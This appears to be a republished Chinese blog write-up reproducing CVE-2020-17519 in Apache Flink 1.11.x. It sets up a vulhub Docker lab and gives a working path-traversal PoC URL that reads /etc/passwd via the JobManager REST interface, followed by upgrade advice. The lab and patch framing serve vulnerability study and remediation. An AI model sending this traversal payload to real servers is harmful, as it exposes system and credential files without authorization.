Apache Flink漏洞(CVE-2020-17519)复现

其他 2021-02-01 10:54:47 阅读次数: 0

简介

 

Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。

 

漏洞概述

 

Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

 

影响版本

1.11.0、1.11.1、1.11.2

 

环境搭建

使用vulhub进行安装

Vulhub地址:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

 

启动Apache Flink jobmanager 1.11.2:

进入目录

cd vulhub-master/flink/CVE-2020-17519

安装环境

docker-compose up -d

然后访问http://your-ip:8081

 

漏洞复现

 

Poc

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

读取成功

 

修复建议

 

升级到安全版本

安全版本:
Flink 1.11.3或Flink 1.12.0

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/112260367
今日推荐
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
周排行
Java基础复习_day13_Collection集合
2018.11.16 c语言学习经验
且看Java内置四大核心函数式接口
小程序云开发中数据库的数据分段和显示图片
python的函数
Web-JS进阶
【干货】C++常用代码积累笔记大全
Spring的ioc操作 与 IOC底层原理
构建之法20191121-11 Scrum立会报告+燃尽图 07
Spring boot之Hello World访问404
每日归档
更多
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022